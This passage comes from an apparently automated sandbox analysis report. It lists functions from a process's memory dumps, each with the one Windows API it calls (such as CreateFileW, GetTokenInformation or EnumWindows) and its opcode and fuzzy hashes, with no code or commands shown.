                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 670fa17f0c5b953cfb8ee9b839e4edda4aad429a30e962958aa3ee2ff4024c29
                                                                                            • Instruction ID: 1f2d3437ac6e1be15b6e455fb5129c880d7627dad7311b3a224ecdb4a6d18658
                                                                                            • Opcode Fuzzy Hash: 670fa17f0c5b953cfb8ee9b839e4edda4aad429a30e962958aa3ee2ff4024c29
                                                                                            • Instruction Fuzzy Hash: AE11A075508380AFDB228F15DC45F52FFB4EF0A220F09C49AED844B663C275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 16d3e0505c76f38b8022a5194fb89b6c77f759fb6891c63c3742584dc033f6ea
                                                                                            • Instruction ID: f455e5b575a137174e8b3da1b71f55451c1d0bd75f6940e1b8df2988e2a69b04
                                                                                            • Opcode Fuzzy Hash: 16d3e0505c76f38b8022a5194fb89b6c77f759fb6891c63c3742584dc033f6ea
                                                                                            • Instruction Fuzzy Hash: C801AD35408740DFEB22DF09D885B25FBA0EF08720F18C49ADD890B656C375E418DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 025F01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 3f0207a96067c343b132a525732d807f5ddc7ce1b47cc8cfeac52b9cc766b9d7
                                                                                            • Instruction ID: 90b7d447b4687556580f7992b990e6322b95c117e04ab40a207dbc34e4bdf4ad
                                                                                            • Opcode Fuzzy Hash: 3f0207a96067c343b132a525732d807f5ddc7ce1b47cc8cfeac52b9cc766b9d7
                                                                                            • Instruction Fuzzy Hash: DC31366650E3C08FE7138B759C65692BFB4AF43210B0E84DBD984CF1A3D6299809DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 025F072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 5192f76b73b16d7ee6f02c2c33be49b9c198cbc468b968630aa24329d8d11422
                                                                                            • Instruction ID: 6a746e7afa304548974b4105c31b4e7005a342f242872f1a77b5dcff599724b6
                                                                                            • Opcode Fuzzy Hash: 5192f76b73b16d7ee6f02c2c33be49b9c198cbc468b968630aa24329d8d11422
                                                                                            • Instruction Fuzzy Hash: 8F316471509380AFE722CF65CC45F56BFF8EF05210F09859EE9858B293D375A908CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 025F0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 821c6d5c9d90e09e6414f32f604c23421e4880dd684a6f03113595037fc5b5bc
                                                                                            • Instruction ID: b006b0aa3a4806dcdf4c288b2ece9be2554ce185ef35d6051ebff3fa5768b9c7
                                                                                            • Opcode Fuzzy Hash: 821c6d5c9d90e09e6414f32f604c23421e4880dd684a6f03113595037fc5b5bc
                                                                                            • Instruction Fuzzy Hash: 9631C8B1509380AFE712CB25DC45B96BFE8EF06214F0884AAE944CF293D375A909C775
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: f6941c99a698fe39b7e5f74782e17d29ab6711806e58411cb6d4c316edcaaf07
                                                                                            • Instruction ID: c2609e30317425c5475379d86c02c4dbc94a8e39d8c9051a9b7001a5ecb6acf5
                                                                                            • Opcode Fuzzy Hash: f6941c99a698fe39b7e5f74782e17d29ab6711806e58411cb6d4c316edcaaf07
                                                                                            • Instruction Fuzzy Hash: 7D31B172009380AFE722CB60CC55F96BFB8EF06210F08849BE984DB192D224A908C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 095481e6d220300e0c7010f91007a50c72091eb20cf38ab338ebdb7001157618
                                                                                            • Instruction ID: ce2e9f404e86777579f38d7b38f184910752929ffb8c15e80339b8a92a50a411
                                                                                            • Opcode Fuzzy Hash: 095481e6d220300e0c7010f91007a50c72091eb20cf38ab338ebdb7001157618
                                                                                            • Instruction Fuzzy Hash: AD21A5B2509380AFE713CB64DC45B96BFB8EF06320F0884DBE984DB193D2659949C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 025F109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 4b6413c97df2d5068650face29ecc8774cece2cea52e1f87b4502c712a61fbaa
                                                                                            • Instruction ID: b0818164cfb3b86ad882efacdd3f32057e4c321419a41fc4adb6847400be27af
                                                                                            • Opcode Fuzzy Hash: 4b6413c97df2d5068650face29ecc8774cece2cea52e1f87b4502c712a61fbaa
                                                                                            • Instruction Fuzzy Hash: 6331737550E3C05FD3138B358C55B55BFB4AF47610F1A81DBD884CF1A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: e92c7508a8af4a0137bcfc920235d44c776031f9dbba4779518198d49e61f355
                                                                                            • Instruction ID: ba3063004e27c45e4b81ce4c3bcfff0a2af2a59d46f006e431b3aab8ec0de766
                                                                                            • Opcode Fuzzy Hash: e92c7508a8af4a0137bcfc920235d44c776031f9dbba4779518198d49e61f355
                                                                                            • Instruction Fuzzy Hash: 9121A175509380AFE722CF15CC45FA6BFB8EF06220F0884ABE945DB192D664E908CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1129996299-0
                                                                                            • Opcode ID: cec2c226197b362c8008321928c3ace7a9d4e4110293abb113cc488166cfa537
                                                                                            • Instruction ID: 7e4afe4f37125db4076946e476cd6b7dd8a688363bdd4873ca928a2c119ffe8e
                                                                                            • Opcode Fuzzy Hash: cec2c226197b362c8008321928c3ace7a9d4e4110293abb113cc488166cfa537
                                                                                            • Instruction Fuzzy Hash: B221A37194D3C0AFD3128B258C55B66BFB4EF47620F1981DBD8848B193D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 025F0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 09e72a1995921d831d10ed725a43dff2c99cf6253d75dac951a86fe33b743a62
                                                                                            • Instruction ID: 2b559c3d7012cc6d970aa1ac3e17266502ae9653a230e9b661a1263723e8b5e0
                                                                                            • Opcode Fuzzy Hash: 09e72a1995921d831d10ed725a43dff2c99cf6253d75dac951a86fe33b743a62
                                                                                            • Instruction Fuzzy Hash: 612107B6408780AFE712CB159C41FA3BFA8EF46720F0881DBF9848B197D224A909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 025F0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 2c1c2d40e8791b482e489709d1c5176c4600d11e96aeab1d0c1b9b7068137faf
                                                                                            • Instruction ID: 99e6fbba734b380b9bdb4a0e3fe8f18a39004b579674a0c1b30465cb0b669062
                                                                                            • Opcode Fuzzy Hash: 2c1c2d40e8791b482e489709d1c5176c4600d11e96aeab1d0c1b9b7068137faf
                                                                                            • Instruction Fuzzy Hash: 61217F7540E3C0AFD3128B358C55B66BFB4EF47610F1A81DBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 025F072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 16e73aad02094aaa56b619bcdf263557725176098eb996ae74d907d1833a0b1c
                                                                                            • Instruction ID: db172fd40b5e8cfadeb3ec2caf7ee7e17a7dd16516fcec1dfa548d3d1b531b16
                                                                                            • Opcode Fuzzy Hash: 16e73aad02094aaa56b619bcdf263557725176098eb996ae74d907d1833a0b1c
                                                                                            • Instruction Fuzzy Hash: 7B21B271500300EFEB21DF65CC85F66FBE8FF08210F0888AAE9498B296D331E804CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 025F08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 9254e933177036b3080650c6059f973fc89253c9354c72b58c5e93d75ccfbf1e
                                                                                            • Instruction ID: 4a877d94bd8b83149c80e970e915cc7020720bcee839b0dd060937a334e616c0
                                                                                            • Opcode Fuzzy Hash: 9254e933177036b3080650c6059f973fc89253c9354c72b58c5e93d75ccfbf1e
                                                                                            • Instruction Fuzzy Hash: 9821A172409380AFE722CF51DC45F96BFB8EF06314F0984DBE9849B193C265A909CB76
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 2b48cb5a5c791f09d1448aa08336dd1a136014536331077853ceeea4a56e6f17
                                                                                            • Instruction ID: 679422468a923e5addcf0559d9ce1d57c52a9ae68f99f0d1570a8d6988531229
                                                                                            • Opcode Fuzzy Hash: 2b48cb5a5c791f09d1448aa08336dd1a136014536331077853ceeea4a56e6f17
                                                                                            • Instruction Fuzzy Hash: CB21957540D780AFD3138B25DC51B62BFB4EF87610F1981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 025F0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 920ee00eede73254b7b8525d38758e06fdc7086021591c1fe0ba73fe5d5782fe
                                                                                            • Instruction ID: a87090f7b91d837850694b49fabbdbf0bb04b6d1be3bf7fafe0036586c6cdf83
                                                                                            • Opcode Fuzzy Hash: 920ee00eede73254b7b8525d38758e06fdc7086021591c1fe0ba73fe5d5782fe
                                                                                            • Instruction Fuzzy Hash: 1A21A1B1500240AFF760DF25CC85B66FBD8EF04210F08846AED48DB286D775E804CA65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 79e8beb07ca2e630020ea9f18a19c393e73fc412c981c1f62749b3d3f68a0409
                                                                                            • Instruction ID: 891cb0f3fe7af0eb41068109d3f0b98fd6cb973892e8e6d901420e16284c88f4
                                                                                            • Opcode Fuzzy Hash: 79e8beb07ca2e630020ea9f18a19c393e73fc412c981c1f62749b3d3f68a0409
                                                                                            • Instruction Fuzzy Hash: 80119D76504304EFEB22DF55DC85FAAFBA8EF04320F14856AF9459A181D670E9448BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 087cda94a1ae4e1cee73b6583ea152fbbaf7a96aab4a1f3f2623deaebd7d6e3f
                                                                                            • Instruction ID: a12703052fd7ca631b6a27ac6abea3fa6b25bc9d40cd466c170385cbe3c0ff80
                                                                                            • Opcode Fuzzy Hash: 087cda94a1ae4e1cee73b6583ea152fbbaf7a96aab4a1f3f2623deaebd7d6e3f
                                                                                            • Instruction Fuzzy Hash: 7E11B175604300EFFB21CF19DC85FAAFBA8EF05220F14846BED49CB681D670E9048A71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 27b419e14d6fde3f4be47d5ccf4a165f12e0863bdf266a4ab011b9a36afbe574
                                                                                            • Instruction ID: 54c9382a82d9b63a29adce42a675de05cd35da1df555a5bd173f8b08c04bc063
                                                                                            • Opcode Fuzzy Hash: 27b419e14d6fde3f4be47d5ccf4a165f12e0863bdf266a4ab011b9a36afbe574
                                                                                            • Instruction Fuzzy Hash: 7A21A1725087809FEB22CF25DC45B96FFF4EF06220F0884AEED858B562D335A449DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 025F0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: a094024586a0163eb3ade1b51d7b0ff560dd5e2a0409578b68327b7b2d766990
                                                                                            • Instruction ID: 46ba567fee8440e0b73f230a3707c9c264adf133996087faec855d82f9b961b0
                                                                                            • Opcode Fuzzy Hash: a094024586a0163eb3ade1b51d7b0ff560dd5e2a0409578b68327b7b2d766990
                                                                                            • Instruction Fuzzy Hash: E5215E7150D7C09FDB528B25DC55B92BFB4AF03224F0D84DAE9888F297D2659408C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D0BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 6fd837dbc9479671e0d246b184f47bb2d8cc980e03dc79804b3952143a8a1375
                                                                                            • Instruction ID: 9610fed8167d28d369ac71e4ed49313b5ef240d08b5a1d07bc42f2c6aabc165a
                                                                                            • Opcode Fuzzy Hash: 6fd837dbc9479671e0d246b184f47bb2d8cc980e03dc79804b3952143a8a1375
                                                                                            • Instruction Fuzzy Hash: A121A4755093C09FDB138B25DC55B92BFA4EF07210F0984EBDD858F1A3D2249908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 317dc8f97267764627045018531eb64611075d7f524b79b912c4fb23b8c2da44
                                                                                            • Instruction ID: deb1dba004b3e3b1bd3436b9f598a0eb613aa56006410ff86b81d83184bb5ae2
                                                                                            • Opcode Fuzzy Hash: 317dc8f97267764627045018531eb64611075d7f524b79b912c4fb23b8c2da44
                                                                                            • Instruction Fuzzy Hash: 3C2175716053809FD722CF29DC54B52BFA8EF56210F0884AAED45CB293D265E404C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 025F1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: ec2af56c069b4800c11df61ef338f484de6948d548c1728824eba97508e1a810
                                                                                            • Instruction ID: 33eca01321a9d36df08307a6f0a80ed753f1e8cf9dd65406aa5bca7f0b27bb51
                                                                                            • Opcode Fuzzy Hash: ec2af56c069b4800c11df61ef338f484de6948d548c1728824eba97508e1a810
                                                                                            • Instruction Fuzzy Hash: C4216D6140D7C09FD7138B25DC64A62BFB4EF57620F0980DBDD848F2A3D2695808D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 6c79ba78c56d3b62d70e5be9f3290235c5c61aa090172aa2608fcafa5ac2a124
                                                                                            • Instruction ID: 1036670e0303c5bd02e361a9a463340cca06ca5441341d67fc9884b8a53f5d89
                                                                                            • Opcode Fuzzy Hash: 6c79ba78c56d3b62d70e5be9f3290235c5c61aa090172aa2608fcafa5ac2a124
                                                                                            • Instruction Fuzzy Hash: 0211C172504300EFEB22DF55DC85BAAFBA8EF45720F14846AFD498B281D670A9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: f1c9da0d778c5729f71e4bf78bf2350ff7818447c0954d7f1fce104364780cb9
                                                                                            • Instruction ID: 289e4ba4c86c05f32d9c853519002ce290afe25e2f7b340fab86a216148f87c0
                                                                                            • Opcode Fuzzy Hash: f1c9da0d778c5729f71e4bf78bf2350ff7818447c0954d7f1fce104364780cb9
                                                                                            • Instruction Fuzzy Hash: B2119D76508380AFDB22CF65CC44B53FFF4EF09210F0884AEE9898B662D375A458CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F80F2F2B,00000000,00000000,00000000,00000000), ref: 025F08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: be83ac60b2b8502eae33054dedca08160b4cbd9230654f3194025d2680b89f13
                                                                                            • Instruction ID: 0e9f4cf0d8798986d62e7de407356721ec897a4f59226f561841cc91d67ac54b
                                                                                            • Opcode Fuzzy Hash: be83ac60b2b8502eae33054dedca08160b4cbd9230654f3194025d2680b89f13
                                                                                            • Instruction Fuzzy Hash: 8B110172000300EFFB21CF50DC40FA6FBA8EF04320F08886AEE089B286D270A504CBB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 01D0A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: c504aa490de1f8c38e738ba8c12391f640504faa1959f3142d6156593af50d04
                                                                                            • Instruction ID: 1ad47031eafcda5544e97d25ef9a1a9f664347d5d4d778df683ef4a0090c8b9f
                                                                                            • Opcode Fuzzy Hash: c504aa490de1f8c38e738ba8c12391f640504faa1959f3142d6156593af50d04
                                                                                            • Instruction Fuzzy Hash: FA118F714093C09FEB128B15DC54B62BFB4DF47614F0880DBEDC44F253D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025F12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 025F132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2131982580.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 35f7eb874505b8a519fa4c6842839c43a8b1f2d01171262e015b0bed5acfcc46
                                                                                            • Instruction ID: 2ed892f7cf4fa37e8624ed6b0ff4d9f164311e15db8b255b55bda0b983c1caa8
                                                                                            • Opcode Fuzzy Hash: 35f7eb874505b8a519fa4c6842839c43a8b1f2d01171262e015b0bed5acfcc46
